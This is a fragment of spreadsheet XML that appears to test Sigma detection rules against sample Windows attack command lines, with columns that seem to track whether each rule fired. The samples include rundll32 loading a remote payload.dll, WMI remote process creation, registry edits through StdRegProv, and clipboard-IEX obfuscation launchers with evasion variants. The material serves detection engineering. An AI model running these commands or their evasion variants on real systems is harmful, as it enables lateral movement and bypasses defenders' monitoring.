      <c r="B1066" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1066" s="44" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1066" s="44" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1066" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-WmiMethod -Namespace 'root\default' -Class StdRegProv -Name CreateKey -ArgumentList @(2147483650, 'SOFTWARE\Policies\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1066" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1066" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1066" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1066" s="43" t="n"/>
      <c r="J1066" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1066" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1067" ht="15.75" customHeight="1" s="42">
      <c r="A1067" s="44" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B1067" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1067" s="44" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1067" s="44" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1067" s="44" t="inlineStr">
        <is>
          <t>powershell -nop -c "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1067" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1067" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1067" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1067" s="43" t="n"/>
      <c r="J1067" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1067" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1068" ht="15.75" customHeight="1" s="42">
      <c r="A1068" s="44" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B1068" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1068" s="44" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1068" s="44" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1068" s="44" t="inlineStr">
        <is>
          <t>powershell -NoProfile -Command "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1068" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1068" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1068" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1068" s="43" t="n"/>
      <c r="J1068" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1068" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1069" ht="15.75" customHeight="1" s="42">
      <c r="A1069" s="44" t="inlineStr">
        <is>
          <t>t1012</t>
        </is>
      </c>
      <c r="B1069" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_stdregprov_reg_modification</t>
        </is>
      </c>
      <c r="C1069" s="44" t="inlineStr">
        <is>
          <t>Registry Manipulation via WMI Stdregprov</t>
        </is>
      </c>
      <c r="D1069" s="44" t="inlineStr">
        <is>
          <t>c453ab7a-1f5c-4716-a3b4-dea8135fb43a</t>
        </is>
      </c>
      <c r="E1069" s="44" t="inlineStr">
        <is>
          <t>powershell -Nop -Command "([wmiclass]'ROOT\\default:StdRegProv').CreateKey(2147483650,'Software\\Policies\\DeleteMe')"</t>
        </is>
      </c>
      <c r="F1069" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1069" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1069" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1069" s="43" t="n"/>
      <c r="J1069" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1069" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1070" ht="15.75" customHeight="1" s="42">
      <c r="A1070" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B1070" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C1070" s="44" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D1070" s="44" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
      <c r="E1070" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe //192.168.1.100/share/payload.dll,EntryPoint</t>
        </is>
      </c>
      <c r="F1070" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1070" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1070" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1070" s="43" t="n"/>
      <c r="J1070" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K1070" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1071" ht="15.75" customHeight="1" s="42">
      <c r="A1071" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B1071" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C1071" s="44" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D1071" s="44" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
      <c r="E1071" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe //192.168.1.1/share/payload.dll,EntryPoint</t>
        </is>
      </c>
      <c r="F1071" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1071" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1071" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1071" s="43" t="n"/>
      <c r="J1071" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1071" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1072" ht="15.75" customHeight="1" s="42">
      <c r="A1072" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B1072" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C1072" s="44" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D1072" s="44" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
      <c r="E1072" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe /"/192.168.1.1/share/payload.dll,EntryPoint"</t>
        </is>
      </c>
      <c r="F1072" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1072" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1072" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1072" s="43" t="n"/>
      <c r="J1072" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1072" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1073" ht="15.75" customHeight="1" s="42">
      <c r="A1073" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B1073" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C1073" s="44" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D1073" s="44" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
      <c r="E1073" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe -"/192.168.1.1/share/payload.dll,EntryPoint"</t>
        </is>
      </c>
      <c r="F1073" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1073" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1073" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1073" s="43" t="n"/>
      <c r="J1073" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1073" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1074" ht="15.75" customHeight="1" s="42">
      <c r="A1074" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B1074" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C1074" s="44" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D1074" s="44" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
      <c r="E1074" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe //192.168.1.1/SHAre/pAYLOAd.Dll,enTrypoiNT</t>
        </is>
      </c>
      <c r="F1074" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1074" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1074" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1074" s="43" t="n"/>
      <c r="J1074" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1074" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1075" ht="15.75" customHeight="1" s="42">
      <c r="A1075" s="44" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B1075" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C1075" s="44" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D1075" s="44" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
      <c r="E1075" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe //192.168.1.1/shAre/PaylOAD.dLl,EnTRYPOInt</t>
        </is>
      </c>
      <c r="F1075" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1075" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1075" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1075" s="43" t="n"/>
      <c r="J1075" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1075" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1076" ht="15.75" customHeight="1" s="42">
      <c r="A1076" s="44" t="inlineStr">
        <is>
          <t>t1021.003</t>
        </is>
      </c>
      <c r="B1076" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_impacket_lateral_movement</t>
        </is>
      </c>
      <c r="C1076" s="44" t="inlineStr">
        <is>
          <t>HackTool - Potential Impacket Lateral Movement Activity</t>
        </is>
      </c>
      <c r="D1076" s="44" t="inlineStr">
        <is>
          <t>10c14723-61c7-4c75-92ca-9af245723ad2</t>
        </is>
      </c>
      <c r="E1076" s="44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F1076" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1076" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1076" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1076" s="43" t="n"/>
      <c r="J1076" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1076" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1077" ht="15.75" customHeight="1" s="42">
      <c r="A1077" s="44" t="inlineStr">
        <is>
          <t>t1021.003</t>
        </is>
      </c>
      <c r="B1077" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_impacket_lateral_movement</t>
        </is>
      </c>
      <c r="C1077" s="44" t="inlineStr">
        <is>
          <t>HackTool - Potential Impacket Lateral Movement Activity</t>
        </is>
      </c>
      <c r="D1077" s="44" t="inlineStr">
        <is>
          <t>10c14723-61c7-4c75-92ca-9af245723ad2</t>
        </is>
      </c>
      <c r="E1077" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nop -WiNdoWsTYle Hidden -c "Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'cmd.exe /c ipconfig &gt; \\127.0.0.2\ADMIN$\output.txt' -ComputerName 10.0.0.5"</t>
        </is>
      </c>
      <c r="F1077" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1077" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1077" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1077" s="43" t="n"/>
      <c r="J1077" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1077" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1078" ht="15.75" customHeight="1" s="42">
      <c r="A1078" s="44" t="inlineStr">
        <is>
          <t>t1021.003</t>
        </is>
      </c>
      <c r="B1078" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_impacket_lateral_movement</t>
        </is>
      </c>
      <c r="C1078" s="44" t="inlineStr">
        <is>
          <t>HackTool - Potential Impacket Lateral Movement Activity</t>
        </is>
      </c>
      <c r="D1078" s="44" t="inlineStr">
        <is>
          <t>10c14723-61c7-4c75-92ca-9af245723ad2</t>
        </is>
      </c>
      <c r="E1078" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -nop -WINdowstyle Hidden -c "Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'cmd.exe /c ipconfig &gt; \\127.0.0.2\ADMIN$\output.txt' -ComputerName 10.0.0.5"</t>
        </is>
      </c>
      <c r="F1078" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1078" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1078" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1078" s="43" t="n"/>
      <c r="J1078" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1078" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1079" ht="15.75" customHeight="1" s="42">
      <c r="A1079" s="44" t="inlineStr">
        <is>
          <t>t1021.003</t>
        </is>
      </c>
      <c r="B1079" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_impacket_lateral_movement</t>
        </is>
      </c>
      <c r="C1079" s="44" t="inlineStr">
        <is>
          <t>HackTool - Potential Impacket Lateral Movement Activity</t>
        </is>
      </c>
      <c r="D1079" s="44" t="inlineStr">
        <is>
          <t>10c14723-61c7-4c75-92ca-9af245723ad2</t>
        </is>
      </c>
      <c r="E1079" s="4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F1079" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1079" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1079" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1079" s="43" t="n"/>
      <c r="J1079" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1079" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1080" ht="15.75" customHeight="1" s="42">
      <c r="A1080" s="43" t="inlineStr">
        <is>
          <t>t1021.003</t>
        </is>
      </c>
      <c r="B1080" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mmc_mmc20_lateral_movement</t>
        </is>
      </c>
      <c r="C1080" s="43" t="inlineStr">
        <is>
          <t>MMC20 Lateral Movement</t>
        </is>
      </c>
      <c r="D1080" s="43" t="inlineStr">
        <is>
          <t>f1f3bf22-deb2-418d-8cce-e1a45e46a5bd</t>
        </is>
      </c>
      <c r="E1080" s="43" t="inlineStr">
        <is>
          <t>C:\WINDOWS\system32\mmc.exe /Embedding</t>
        </is>
      </c>
      <c r="F1080" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1080" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1080" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1080" s="43" t="n"/>
      <c r="J1080" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K1080" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1081" ht="15.75" customHeight="1" s="42">
      <c r="A1081" s="44" t="inlineStr">
        <is>
          <t>t1021.003</t>
        </is>
      </c>
      <c r="B1081" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mmc_mmc20_lateral_movement</t>
        </is>
      </c>
      <c r="C1081" s="44" t="inlineStr">
        <is>
          <t>MMC20 Lateral Movement</t>
        </is>
      </c>
      <c r="D1081" s="44" t="inlineStr">
        <is>
          <t>f1f3bf22-deb2-418d-8cce-e1a45e46a5bd</t>
        </is>
      </c>
      <c r="E1081" s="44" t="inlineStr">
        <is>
          <t>C:\WINDOWS\system32\mmc.exe "-Embedding"</t>
        </is>
      </c>
      <c r="F1081" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1081" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1081" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1081" s="43" t="n"/>
      <c r="J1081" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K1081" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1082" ht="15.75" customHeight="1" s="42">
      <c r="A1082" s="44" t="inlineStr">
        <is>
          <t>t1021.003</t>
        </is>
      </c>
      <c r="B1082" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_mmc_mmc20_lateral_movement</t>
        </is>
      </c>
      <c r="C1082" s="44" t="inlineStr">
        <is>
          <t>MMC20 Lateral Movement</t>
        </is>
      </c>
      <c r="D1082" s="44" t="inlineStr">
        <is>
          <t>f1f3bf22-deb2-418d-8cce-e1a45e46a5bd</t>
        </is>
      </c>
      <c r="E1082" s="44" t="inlineStr">
        <is>
          <t>C:\WINDOWS\system32\mmc.exe -Embed""ding</t>
        </is>
      </c>
      <c r="F1082" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1082" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1082" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1082" s="43" t="n"/>
      <c r="J1082" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K1082" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1083" ht="15.75" customHeight="1" s="42">
      <c r="A1083" s="44" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B1083" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1083" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1083" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1083" s="44" t="inlineStr">
        <is>
          <t>cmd /"c" "echo Write-Host 'Test Execution' | clip &amp; powershell -NoProfile -Command Add-Type -AssemblyName System.Windows.Forms; IEX([System.Windows.Forms.Clipboard]::GetText())"</t>
        </is>
      </c>
      <c r="F1083" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1083" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1083" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1083" s="43" t="n"/>
      <c r="J1083" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1083" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1084" ht="15.75" customHeight="1" s="42">
      <c r="A1084" s="44" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B1084" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1084" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1084" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1084" s="44" t="inlineStr">
        <is>
          <t>cmd -"c" "echo Write-Host 'Test Execution' | clip &amp; powershell -NoProfile -Command Add-Type -AssemblyName System.Windows.Forms; IEX([System.Windows.Forms.Clipboard]::GetText())"</t>
        </is>
      </c>
      <c r="F1084" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1084" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1084" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1084" s="43" t="n"/>
      <c r="J1084" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1084" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1085" ht="15.75" customHeight="1" s="42">
      <c r="A1085" s="44" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B1085" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1085" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1085" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1085" s="44" t="inlineStr">
        <is>
          <t>cmd /c "echo Write-Host 'Bypass' | clip &amp; powershell.exe -nop -c \"iex([System.Windows.Forms.Clipboard]::GetText())\""</t>
        </is>
      </c>
      <c r="F1085" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1085" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1085" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1085" s="43" t="n"/>
      <c r="J1085" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1085" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1086" ht="15.75" customHeight="1" s="42">
      <c r="A1086" s="44" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B1086" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1086" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1086" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1086" s="44" t="inlineStr">
        <is>
          <t>cmd /"c" "echo Write-Host 'Bypass' | clip &amp; powershell.exe -nop -c \" iex([System.Windows.Forms.Clipboard]::GetText())\""</t>
        </is>
      </c>
      <c r="F1086" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1086" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1086" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1086" s="43" t="n"/>
      <c r="J1086" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1086" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1087" ht="15.75" customHeight="1" s="42">
      <c r="A1087" s="44" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B1087" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1087" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1087" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1087" s="44" t="inlineStr">
        <is>
          <t>cmd -"c" "echo Write-Host 'Bypass' | clip &amp; powershell.exe -nop -c \" iex([System.Windows.Forms.Clipboard]::GetText())\""</t>
        </is>
      </c>
      <c r="F1087" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1087" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1087" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1087" s="43" t="n"/>
      <c r="J1087" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1087" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1088" ht="15.75" customHeight="1" s="42">
      <c r="A1088" s="44" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B1088" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1088" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1088" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1088" s="44" t="inlineStr">
        <is>
          <t>cmd /"c" "echo Write-Host 'Test' | clip &amp; powershell -Sta -NoProfile -Command Add-Type -AssemblyName PresentationCore; Invoke-Expression ([System.Windows.Clipboard]::GetText())"</t>
        </is>
      </c>
      <c r="F1088" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1088" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1088" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1088" s="44" t="n"/>
      <c r="J1088" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1088" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1089" ht="15.75" customHeight="1" s="42">
      <c r="A1089" s="44" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B1089" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1089" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1089" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1089" s="44" t="inlineStr">
        <is>
          <t>cmd -"c" "echo Write-Host 'Test' | clip &amp; powershell -Sta -NoProfile -Command Add-Type -AssemblyName PresentationCore; Invoke-Expression ([System.Windows.Clipboard]::GetText())"</t>
        </is>
      </c>
      <c r="F1089" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1089" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1089" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1089" s="43" t="n"/>
      <c r="J1089" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1089" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1090" ht="15.75" customHeight="1" s="42">
      <c r="A1090" s="44" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B1090" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1090" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1090" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1090" s="44" t="inlineStr">
        <is>
          <t>cmd /r "echo Write-Host 'Bypass' | clip &amp;&amp; powershell.exe -nop -c \"$c='cl'+'ipboard]::'; iex([System.Windows.Forms.Clipboard]::GetText())\""</t>
        </is>
      </c>
      <c r="F1090" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1090" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1090" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1090" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip (e1561947-b4e3-4a74-9bdd-83baed21bdb5); Invoke-Obfuscation Via Use Clip (e1561947-b4e3-4a74-9bdd-83baed21bdb5)</t>
        </is>
      </c>
      <c r="J1090" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1090" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1091" ht="15.75" customHeight="1" s="42">
      <c r="A1091" s="44" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B1091" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1091" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1091" s="44" t="inlineStr">
        <is>
          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1091" s="44" t="inlineStr">
        <is>
          <t>cmd -"r" "echo Write-Host 'Bypass' | clip &amp;&amp; powershell.exe -nop -c \" $c='cl'+'ipboard]::'; iex([System.Windows.Forms.Clipboard]::GetText())\""</t>
        </is>
      </c>
      <c r="F1091" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1091" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1091" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1091" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip (e1561947-b4e3-4a74-9bdd-83baed21bdb5); Invoke-Obfuscation Via Use Clip (e1561947-b4e3-4a74-9bdd-83baed21bdb5)</t>
        </is>
      </c>
      <c r="J1091" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1091" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1092" ht="15.75" customHeight="1" s="42">
      <c r="A1092" s="44" t="inlineStr">
        <is>
          <t>t1027</t>
        </is>
      </c>
      <c r="B1092" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_clip</t>
        </is>
      </c>
      <c r="C1092" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation CLIP+ Launcher</t>
        </is>
      </c>
      <c r="D1092" s="44" t="inlineStr">
        <is>
